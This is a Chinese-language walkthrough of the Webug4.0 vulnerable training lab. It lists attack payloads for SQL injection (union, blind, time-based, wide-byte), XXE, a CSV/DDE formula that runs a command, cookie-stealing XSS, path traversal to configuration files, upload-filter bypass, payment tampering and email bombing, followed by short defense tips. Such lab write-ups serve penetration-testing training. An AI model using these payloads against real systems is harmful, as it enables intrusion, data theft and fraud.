Webug4.0靶场通关
字数 1021 2025-08-24 16:48:16
Webug4.0靶场通关全面教学指南
1. SQL注入攻击技术详解
1.1 显错注入
注入点识别:
- 目标URL:
control/sqlinject/manifest_error.php?id=1 - 判断注入类型:
- 输入
and 1=1和and 1=2都正常 → 非数字型 - 输入单引号
'页面变化 → 字符型 - 输入
' -- q注释后正常 → 确认字符型
- 输入
攻击步骤:
- 判断字段数:
' order by 3-- q # 错误 ' order by 2-- q # 正常 → 字段数为2 - 查找回显点:
' union select 1,2 -- q - 查询数据库信息:
' union select 1,database() -- q # 当前数据库 ' union select 1,group_concat(schema_name) from information_schema.schemata -- q # 所有数据库 - 查询特定表:
' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' -- q - 获取flag:
' union select 1,group_concat(flag) from flag-- q
1.2 布尔盲注
攻击原理:
- 通过页面返回的真假状态推断信息
攻击步骤:
- 判断数据库长度:
id=1' and length(database())=5--+ - 爆破数据库名:
id=1' and ascii(substr(database(),1,1))=119 --+ - 判断表数量:
id=1' and (select count(*) from information_schema.tables where table_schema=database())=7--+ - 爆破表名:
id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8--+ id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101--+
1.3 延时注入
攻击特点:
- 通过响应时间判断条件真假
攻击模式:
1' and if(条件,sleep(3),1)--+
示例:
1' and if(length(database())=5,sleep(3),1)--+
1' and if(ascii(substr(database(),1,1))=119,sleep(3),1)--+
1.4 POST注入
识别方法:
- 搜索框输入
1'出现报错 - 确认注入:
1' or sleep(3)--+ # 出现延迟
1.5 宽字节注入
绕过技巧:
- 利用GBK等宽字符集特性
- 构造payload:
id=1%df%27--+ id=1%df%27 order by 2--+ id=1%df%27 and 1=2 union select 1,2--+
2. XXE注入攻击
攻击步骤:
- 测试XML解析:
<?xml version="1.0"?> <helo> <batch id="test"> <title>xxe</title> <test>xxe test</test> </batch> </helo> - 确认可解析后构造恶意XML
3. CSV注入攻击
攻击原理:
- Excel自动执行公式
- DDE(动态数据交换)机制滥用
payload示例:
=cmd|' /C calc'!A0
4. XSS攻击技术
4.1 反射型XSS
id=1<script>alert(document.cookie)</script>
4.2 存储型XSS
- 在留言框输入:
<script>alert(document.cookie)</script>
4.3 DOM型XSS
"required=" "><script>alert(document.cookie)</script><name="
4.4 过滤绕过
- 当script被过滤时:
5. 链接注入
id=<a href="http://baidu.com">baidu</a>
6. 文件相关漏洞
6.1 任意文件下载
- 修改参数:
file=template/assets/img/1.txt file=index.php
6.2 MySQL配置文件下载
file=../mysql/
file=../mysql/my.ini
6.3 文件上传绕过
前端拦截绕过:
- 修改php文件后缀为png
- Burp抓包改回.php
畸形文件绕过:
- 命名如
phpinfo.pphphp
7. 支付漏洞
- 拦截购买请求
- 修改金额参数:
100 → 0.01
8. 邮箱轰炸
- 输入邮箱注册
- Burp抓包
- Intruder模块设置Null payload
- 设置发送次数(如20次)
9. URL跳转
url=https://www.baidu.com
url=https://www.bilibili.com
10. 文件包含漏洞
filename=../../control/upload_file/upload_file_3.php
防御建议
-
SQL注入防御:
- 使用预编译语句
- 严格参数化查询
- 最小权限原则
-
XSS防御:
- 输入输出过滤
- CSP策略
- HttpOnly标志
-
文件安全:
- 限制上传文件类型
- 文件内容检查
- 存储隔离
-
其他:
- XXE禁用外部实体
- 支付金额服务器端校验
- 验证URL跳转目标
本教学文档涵盖了Webug4.0靶场中所有关键漏洞的利用方法和原理,按照实际攻击流程组织内容,可作为渗透测试学习和实践的参考指南。